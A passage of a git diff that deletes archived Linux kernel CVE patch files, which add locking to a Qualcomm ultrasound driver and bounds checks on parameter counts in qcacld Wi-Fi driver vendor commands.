-+static long __usf_compat_ioctl(struct usf_type *usf,
- 			     unsigned int cmd,
- 			     unsigned long arg)
- {
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -2119,7 +2148,7 @@ static long usf_compat_ioctl(struct file *file,
- 	case US_START_RX:
- 	case US_STOP_TX:
- 	case US_STOP_RX: {
--		return usf_ioctl(file, cmd, arg);
-+		return __usf_ioctl(usf, cmd, arg);
- 	}
- 
- 	case US_SET_TX_INFO32: {
-@@ -2228,6 +2257,20 @@ static long usf_compat_ioctl(struct file *file,
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_compat_ioctl */
-+
-+static long usf_compat_ioctl(struct file *file,
-+			     unsigned int cmd,
-+			     unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_compat_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_compat_ioctl */
- #endif /* CONFIG_COMPAT */
- 
-@@ -2236,13 +2279,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms)
- 	struct usf_type *usf = file->private_data;
- 	int dir = OUT;
- 	struct usf_xx_type *usf_xx = &usf->usf_tx;
-+	int rc = 0;
- 
-+	mutex_lock(&usf->mutex);
- 	if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */
- 		dir = IN;
- 		usf_xx = &usf->usf_rx;
- 	}
-+	rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	mutex_unlock(&usf->mutex);
- 
--	return q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	return rc;
- }
- 
- static uint16_t add_opened_dev(int minor)
-@@ -2294,6 +2341,8 @@ static int usf_open(struct inode *inode, struct file *file)
- 	usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF;
- 	usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF;
- 
-+	mutex_init(&usf->mutex);
-+
- 	pr_debug("%s:usf in open\n", __func__);
- 	return 0;
- }
-@@ -2304,6 +2353,7 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	pr_debug("%s: release entry\n", __func__);
- 
-+	mutex_lock(&usf->mutex);
- 	usf_release_input(usf);
- 
- 	usf_disable(&usf->usf_tx);
-@@ -2311,6 +2361,8 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	s_opened_devs[usf->dev_ind] = 0;
- 
-+	mutex_unlock(&usf->mutex);
-+	mutex_destroy(&usf->mutex);
- 	kfree(usf);
- 	pr_debug("%s: release exit\n", __func__);
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2017-0435/ANY/0002.patch
deleted file mode 100644
index ab99a331..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0435/ANY/0002.patch
+++ /dev/null
@@ -1,26 +0,0 @@
-From 831da5d113d214db6894e9fd0ce98762ee8a544a Mon Sep 17 00:00:00 2001
-From: Nick Desaulniers <ndesaulniers@google.com>
-Date: Tue, 6 Dec 2016 09:57:57 -0800
-Subject: [PATCH] Kconfig: msm: disable ultrasound driver
-
-Bug: 31906415
-Bug: 31906657
-Bug: 32553868
-Change-Id: Iab736a5d5622098c89c76dbe6b0b395652bbae57
-Signed-off-by: Nick Desaulniers <ndesaulniers@google.com>
----
- sound/soc/msm/Kconfig | 1 -
- 1 file changed, 1 deletion(-)
-
-diff --git a/sound/soc/msm/Kconfig b/sound/soc/msm/Kconfig
-index 6eb168e4d10d5..2e6f642241ef3 100644
---- a/sound/soc/msm/Kconfig
-+++ b/sound/soc/msm/Kconfig
-@@ -267,7 +267,6 @@ config SND_SOC_MSM8994
- 	select SND_SOC_MSM_HDMI_CODEC_RX
- 	select QTI_PP
- 	select SND_SOC_CPE
--	select MSM_ULTRASOUND
- 	select SND_HWDEP
- 	help
- 	 To add support for SoC audio on MSM8994.
diff --git a/Patches/Linux_CVEs/CVE-2017-0436/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0436/ANY/0001.patch
deleted file mode 100644
index 5651b6b3..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0436/ANY/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@
-From ce9db0874906f6aedd80bb28d457eadfe38bdd02 Mon Sep 17 00:00:00 2001
-From: Sudheer Papothi <spapothi@codeaurora.org>
-Date: Wed, 26 Oct 2016 01:07:04 +0530
-Subject: drivers: qcom: ultrasound: Lock async driver calls
-
-Adds lock to ioctl and other external calls to driver.
-Adds missing null check in __usf_set_stream_param.
-
-Change-Id: I142f31c6bb46d6a394ad012077e1703875a120ad
-Signed-off-by: Sudheer Papothi <spapothi@codeaurora.org>
----
- drivers/misc/qcom/qdsp6v2/ultrasound/usf.c | 66 ++++++++++++++++++++++++++----
- 1 file changed, 59 insertions(+), 7 deletions(-)
-
-diff --git a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-index d535ccb..9270dbc 100644
---- a/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-+++ b/drivers/misc/qcom/qdsp6v2/ultrasound/usf.c
-@@ -22,6 +22,7 @@
- #include <linux/uaccess.h>
- #include <linux/time.h>
- #include <linux/kmemleak.h>
-+#include <linux/mutex.h>
- #include <sound/apr_audio.h>
- #include <linux/qdsp6v2/usf.h>
- #include "q6usm.h"
-@@ -128,6 +129,8 @@ struct usf_type {
- 	uint16_t conflicting_event_filters;
- 	/* The requested buttons bitmap */
- 	uint16_t req_buttons_bitmap;
-+	/* Mutex for exclusive operations (all public APIs) */
-+	struct mutex mutex;
- };
- 
- struct usf_input_dev_type {
-@@ -1376,9 +1379,22 @@ static int __usf_set_stream_param(struct usf_xx_type *usf_xx,
- 				int dir)
- {
- 	struct us_client *usc = usf_xx->usc;
--	struct us_port_data *port = &usc->port[dir];
-+	struct us_port_data *port;
- 	int rc = 0;
- 
-+	if (usc == NULL) {
-+		pr_err("%s: usc is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
-+	port = &usc->port[dir];
-+	if (port == NULL) {
-+		pr_err("%s: port is null\n",
-+			__func__);
-+		return -EFAULT;
-+	}
-+
- 	if (port->param_buf == NULL) {
- 		pr_err("%s: parameter buffer is null\n",
- 			__func__);
-@@ -1503,10 +1519,12 @@ static int usf_get_stream_param(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param */
- 
--static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long __usf_ioctl(struct usf_type *usf,
-+		unsigned int cmd,
-+		unsigned long arg)
- {
-+
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -1669,6 +1687,18 @@ static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_ioctl */
-+
-+static long usf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_ioctl */
- 
- #ifdef CONFIG_COMPAT
-@@ -2106,12 +2136,11 @@ static int usf_get_stream_param32(struct usf_xx_type *usf_xx,
- 	return __usf_get_stream_param(usf_xx, &get_stream_param, dir);
- } /* usf_get_stream_param32 */
- 
--static long usf_compat_ioctl(struct file *file,
-+static long __usf_compat_ioctl(struct usf_type *usf,
- 			     unsigned int cmd,
- 			     unsigned long arg)
- {
- 	int rc = 0;
--	struct usf_type *usf = file->private_data;
- 	struct usf_xx_type *usf_xx = NULL;
- 
- 	switch (cmd) {
-@@ -2119,7 +2148,7 @@ static long usf_compat_ioctl(struct file *file,
- 	case US_START_RX:
- 	case US_STOP_TX:
- 	case US_STOP_RX: {
--		return usf_ioctl(file, cmd, arg);
-+		return __usf_ioctl(usf, cmd, arg);
- 	}
- 
- 	case US_SET_TX_INFO32: {
-@@ -2228,6 +2257,20 @@ static long usf_compat_ioctl(struct file *file,
- 		release_xx(usf_xx);
- 
- 	return rc;
-+} /* __usf_compat_ioctl */
-+
-+static long usf_compat_ioctl(struct file *file,
-+			     unsigned int cmd,
-+			     unsigned long arg)
-+{
-+	struct usf_type *usf = file->private_data;
-+	int rc = 0;
-+
-+	mutex_lock(&usf->mutex);
-+	rc = __usf_compat_ioctl(usf, cmd, arg);
-+	mutex_unlock(&usf->mutex);
-+
-+	return rc;
- } /* usf_compat_ioctl */
- #endif /* CONFIG_COMPAT */
- 
-@@ -2236,13 +2279,17 @@ static int usf_mmap(struct file *file, struct vm_area_struct *vms)
- 	struct usf_type *usf = file->private_data;
- 	int dir = OUT;
- 	struct usf_xx_type *usf_xx = &usf->usf_tx;
-+	int rc = 0;
- 
-+	mutex_lock(&usf->mutex);
- 	if (vms->vm_flags & USF_VM_WRITE) { /* RX buf mapping */
- 		dir = IN;
- 		usf_xx = &usf->usf_rx;
- 	}
-+	rc = q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	mutex_unlock(&usf->mutex);
- 
--	return q6usm_get_virtual_address(dir, usf_xx->usc, vms);
-+	return rc;
- }
- 
- static uint16_t add_opened_dev(int minor)
-@@ -2294,6 +2341,8 @@ static int usf_open(struct inode *inode, struct file *file)
- 	usf->usf_tx.us_detect_type = USF_US_DETECT_UNDEF;
- 	usf->usf_rx.us_detect_type = USF_US_DETECT_UNDEF;
- 
-+	mutex_init(&usf->mutex);
-+
- 	pr_debug("%s:usf in open\n", __func__);
- 	return 0;
- }
-@@ -2304,6 +2353,7 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	pr_debug("%s: release entry\n", __func__);
- 
-+	mutex_lock(&usf->mutex);
- 	usf_release_input(usf);
- 
- 	usf_disable(&usf->usf_tx);
-@@ -2311,6 +2361,8 @@ static int usf_release(struct inode *inode, struct file *file)
- 
- 	s_opened_devs[usf->dev_ind] = 0;
- 
-+	mutex_unlock(&usf->mutex);
-+	mutex_destroy(&usf->mutex);
- 	kfree(usf);
- 	pr_debug("%s: release exit\n", __func__);
- 	return 0;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0437/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0437/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e7bc3db..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0437/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From 1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Mon, 28 Nov 2016 09:19:02 -0800
-Subject: qcacld-2.0: Avoid overflow of roam subcmd params
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer.  In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
-  allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
-  expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
-  the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 37 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b3c265c..800d123 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 	struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- 	int rem, i;
- 	uint32_t buf_len = 0;
-+	uint32_t count;
- 	int ret;
- 
- 	if (VOS_FTM_MODE == hdd_get_conparam()) {
-@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of preferred bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_favored = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
-+		if (count > MAX_BSSID_FAVORED) {
-+			hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_FAVORED);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of Preferred BSSID (%d)"),
--			roam_params.num_bssid_favored);
-+			FL("Num of Preferred BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Preferred BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_favored_factor[i]);
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Preferred BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_favored = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- 		break;
-@@ -2092,15 +2108,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of blacklist bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_avoid_list = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
-+		if (count > MAX_BSSID_AVOID_LIST) {
-+			hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_AVOID_LIST);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of blacklist BSSID (%d)"),
--			roam_params.num_bssid_avoid_list);
-+			FL("Num of blacklist BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Blacklist BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_avoid_list[i]));
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Blacklist BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_avoid_list = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0438/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0438/qcacld-2.0/0001.patch
deleted file mode 100644
index 3e7bc3db..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0438/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,128 +0,0 @@
-From 1f0b036dc74ccb6e9f0a03a540efdb0876f5ca77 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Mon, 28 Nov 2016 09:19:02 -0800
-Subject: qcacld-2.0: Avoid overflow of roam subcmd params
-
-Currently when processing the QCA_NL80211_VENDOR_SUBCMD_ROAM vendor
-command, for the following roam commands there are input validation
-issues:
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BSSID_PREFS
-	QCA_WLAN_VENDOR_ATTR_ROAM_SUBCMD_SET_BLACKLIST_BSSID
-
-Both of these commands have a "number of BSSIDs" attribute as well as a
-list of BSSIDs. However there is no validation that the number of
-BSSIDs provided won't overflow the destination buffer.  In addition
-there is no validation that the number of BSSIDs actually provided
-matches the number of BSSIDs expected.
-
-To address these issues, for the above mentioned commands:
-* Verify that the expected number of BSSIDs doesn't exceed the maximum
-  allowed number of BSSIDs
-* Verify that the actual number of BSSIDs supplied doesn't exceed the
-  expected number of BSSIDs
-* Only process the actual number of supplied BSSIDs if it is less than
-  the expected number of BSSIDs.
-
-Change-Id: Ifa6121ee1b1441ec415198897ef815b40cb5aff6
-CRs-Fixed: 1092497
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 43 ++++++++++++++++++++++++++++++++++------
- 1 file changed, 37 insertions(+), 6 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index b3c265c..800d123 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -1870,6 +1870,7 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 	struct nlattr *tb2[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX + 1];
- 	int rem, i;
- 	uint32_t buf_len = 0;
-+	uint32_t count;
- 	int ret;
- 
- 	if (VOS_FTM_MODE == hdd_get_conparam()) {
-@@ -2045,15 +2046,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of preferred bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_favored = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_LAZY_ROAM_NUM_BSSID]);
-+		if (count > MAX_BSSID_FAVORED) {
-+			hddLog(LOGE, FL("Preferred BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_FAVORED);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of Preferred BSSID (%d)"),
--			roam_params.num_bssid_favored);
-+			FL("Num of Preferred BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PREFS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Preferred BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2083,6 +2094,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_favored_factor[i]);
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Preferred BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_favored = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_FAVORED_BSSID);
- 		break;
-@@ -2092,15 +2108,25 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 			hddLog(LOGE, FL("attr num of blacklist bssid failed"));
- 			goto fail;
- 		}
--		roam_params.num_bssid_avoid_list = nla_get_u32(
-+		count = nla_get_u32(
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS_NUM_BSSID]);
-+		if (count > MAX_BSSID_AVOID_LIST) {
-+			hddLog(LOGE, FL("Blacklist BSSID count %u exceeds max %u"),
-+			       count, MAX_BSSID_AVOID_LIST);
-+			goto fail;
-+		}
- 		hddLog(VOS_TRACE_LEVEL_DEBUG,
--			FL("Num of blacklist BSSID (%d)"),
--			roam_params.num_bssid_avoid_list);
-+			FL("Num of blacklist BSSID: %d"), count);
- 		i = 0;
- 		nla_for_each_nested(curr_attr,
- 			tb[QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_SET_BSSID_PARAMS],
- 			rem) {
-+
-+			if (i == count) {
-+				hddLog(LOGW, FL("Ignoring excess Blacklist BSSID"));
-+				break;
-+			}
-+
- 			if (nla_parse(tb2,
- 				QCA_WLAN_VENDOR_ATTR_ROAMING_PARAM_MAX,
- 				nla_data(curr_attr), nla_len(curr_attr),
-@@ -2121,6 +2147,11 @@ __wlan_hdd_cfg80211_set_ext_roam_params(struct wiphy *wiphy,
- 				roam_params.bssid_avoid_list[i]));
- 			i++;
- 		}
-+		if (i < count)
-+			hddLog(LOGW,
-+			       FL("Num Blacklist BSSID %u less than expected %u"),
-+			       i, count);
-+		roam_params.num_bssid_avoid_list = i;
- 		sme_update_roam_params(pHddCtx->hHal, session_id,
- 			roam_params, REASON_ROAM_SET_BLACKLIST_BSSID);
- 		break;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0439/qcacld-2.0/0001.patch
deleted file mode 100644
index 14c1d49c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,57 +0,0 @@
-From 81b6b5538d3227ed4b925fcceedb109abb2a4c61 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Fri, 18 Nov 2016 11:35:01 -0800
-Subject: qcacld-2.0: Avoid overflow of passpoint network list
-
-Currently when processing a passpoint vendor command the "num
-networks" attribute is limit checked and if it exceeds a MAX value
-then the command is rejected. Otherwise this value is used to
-calculate the size of the buffer allocated to hold the internal
-representation of the request. However later when the network
-attributes are parsed there is no check to make sure the number of
-networks processed does not exceed the "num networks" used to allocate
-memory, and as a result a buffer overflow can occur. Address this
-issue by aborting the network parsing once "num networks" records have
-been parsed.
-
-Change-Id: I38d9f19b08b42fa9a850eb70a42920fbc3b99cf6
-CRs-Fixed: 1092059
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index a2ff8fe..54c5e54 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -5127,11 +5127,19 @@ static int hdd_extscan_passpoint_fill_network_list(
- 	struct nlattr *networks;
- 	int rem1, len;
- 	uint8_t index;
-+	uint32_t expected_networks;
- 
-+	expected_networks = req_msg->num_networks;
- 	index = 0;
- 	nla_for_each_nested(networks,
- 		tb[QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY],
- 		rem1) {
-+
-+		if (index == expected_networks) {
-+			hddLog(LOGW, FL("ignoring excess networks"));
-+			break;
-+		}
-+
- 		if (nla_parse(network,
- 			QCA_WLAN_VENDOR_ATTR_PNO_MAX,
- 			nla_data(networks), nla_len(networks), NULL)) {
-@@ -5193,6 +5201,7 @@ static int hdd_extscan_passpoint_fill_network_list(
- 
- 		index++;
- 	}
-+	req_msg->num_networks = index;
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-3.0/0002.patch b/Patches/Linux_CVEs/CVE-2017-0439/qcacld-3.0/0002.patch
deleted file mode 100644
index 58045e51..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0439/qcacld-3.0/0002.patch
+++ /dev/null
@@ -1,59 +0,0 @@
-From ff866a1e9a0f653252b5d5b7eb087374c5bad65d Mon Sep 17 00:00:00 2001
-From: Jeff Johnson <jjohnson@codeaurora.org>
-Date: Fri, 18 Nov 2016 11:44:29 -0800
-Subject: qcacld-3.0: Avoid overflow of passpoint network list
-
-This is a qcacld-2.0 to qcacld-3.0 propagation.
-
-Currently when processing a passpoint vendor command the "num
-networks" attribute is limit checked and if it exceeds a MAX value
-then the command is rejected. Otherwise this value is used to
-calculate the size of the buffer allocated to hold the internal
-representation of the request. However later when the network
-attributes are parsed there is no check to make sure the number of
-networks processed does not exceed the "num networks" used to allocate
-memory, and as a result a buffer overflow can occur. Address this
-issue by aborting the network parsing once "num networks" records have
-been parsed.
-
-Change-Id: I38d9f19b08b42fa9a850eb70a42920fbc3b99cf6
-CRs-Fixed: 1092059
----
- core/hdd/src/wlan_hdd_ext_scan.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/core/hdd/src/wlan_hdd_ext_scan.c b/core/hdd/src/wlan_hdd_ext_scan.c
-index 6515bd4..44c574b 100644
---- a/core/hdd/src/wlan_hdd_ext_scan.c
-+++ b/core/hdd/src/wlan_hdd_ext_scan.c
-@@ -4080,11 +4080,19 @@ static int hdd_extscan_passpoint_fill_network_list(
- 	struct nlattr *networks;
- 	int rem1, len;
- 	uint8_t index;
-+	uint32_t expected_networks;
- 
-+	expected_networks = req_msg->num_networks;
- 	index = 0;
- 	nla_for_each_nested(networks,
- 		tb[QCA_WLAN_VENDOR_ATTR_PNO_PASSPOINT_LIST_PARAM_NETWORK_ARRAY],
- 		rem1) {
-+
-+		if (index == expected_networks) {
-+			hdd_warn("ignoring excess networks");
-+			break;
-+		}
-+
- 		if (nla_parse(network,
- 			QCA_WLAN_VENDOR_ATTR_PNO_MAX,
- 			nla_data(networks), nla_len(networks), NULL)) {
-@@ -4143,6 +4151,7 @@ static int hdd_extscan_passpoint_fill_network_list(
- 
- 		index++;
- 	}
-+	req_msg->num_networks = index;
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0440/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-0440/qcacld-2.0/0001.patch
deleted file mode 100644
index d78b4149..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0440/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,88 +0,0 @@
-From 10f0051f7b3b9a7635b0762a8cf102f595f7a268 Mon Sep 17 00:00:00 2001
-From: Srinivas Girigowda <sgirigow@codeaurora.org>
-Date: Wed, 30 Nov 2016 12:27:44 -0800
-Subject: qcacld-2.0: Avoid overflow of "set_bssid_hotlist" params
-
-The wlan driver supports the following vendor command:
-	QCA_NL80211_VENDOR_SUBCMD_EXTSCAN_SET_BSSID_HOTLIST
-
-This command supplies a "number of APs" attribute as well as a list of
-per-AP attributes.  However there is no validation that the number of
-APs provided won't overflow the destination buffer.  In addition there
-is no validation that the number of APs actually provided matches the
-number of APs expected.
-
-To address these issues:
-* Verify that the expected number of APs doesn't exceed the maximum
-  allowed number of APs
-* Verify that the actual number of APs supplied doesn't exceed the
-  expected number of APs
-* Only process the actual number of supplied APs if it is less than
-  the expected number of APs.
-
-Change-Id: I41e36d11bc3e71928866a27afc2fbf046b59f0f5
-CRs-Fixed: 1095770
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 16 ++++++++++++++++
- CORE/SERVICES/WMA/wma.c          |  4 ++--
- 2 files changed, 18 insertions(+), 2 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index d91859f..1991204 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -2893,6 +2893,11 @@ static int __wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy,
-     }
-     pReqMsg->numAp = nla_get_u32(
-               tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_BSSID_HOTLIST_PARAMS_NUM_AP]);
-+    if (pReqMsg->numAp > WLAN_EXTSCAN_MAX_HOTLIST_APS) {
-+        hddLog(LOGE, FL("Number of AP: %u exceeds max: %u"),
-+               pReqMsg->numAp, WLAN_EXTSCAN_MAX_HOTLIST_APS);
-+        goto fail;
-+    }
-     hddLog(LOG1, FL("Number of AP %d"), pReqMsg->numAp);
- 
-     /* Parse and fetch lost ap sample size */
-@@ -2911,6 +2916,11 @@ static int __wlan_hdd_cfg80211_extscan_set_bssid_hotlist(struct wiphy *wiphy,
-     i = 0;
-     nla_for_each_nested(apTh,
-                 tb[QCA_WLAN_VENDOR_ATTR_EXTSCAN_AP_THRESHOLD_PARAM], rem) {
-+        if (i == pReqMsg->numAp) {
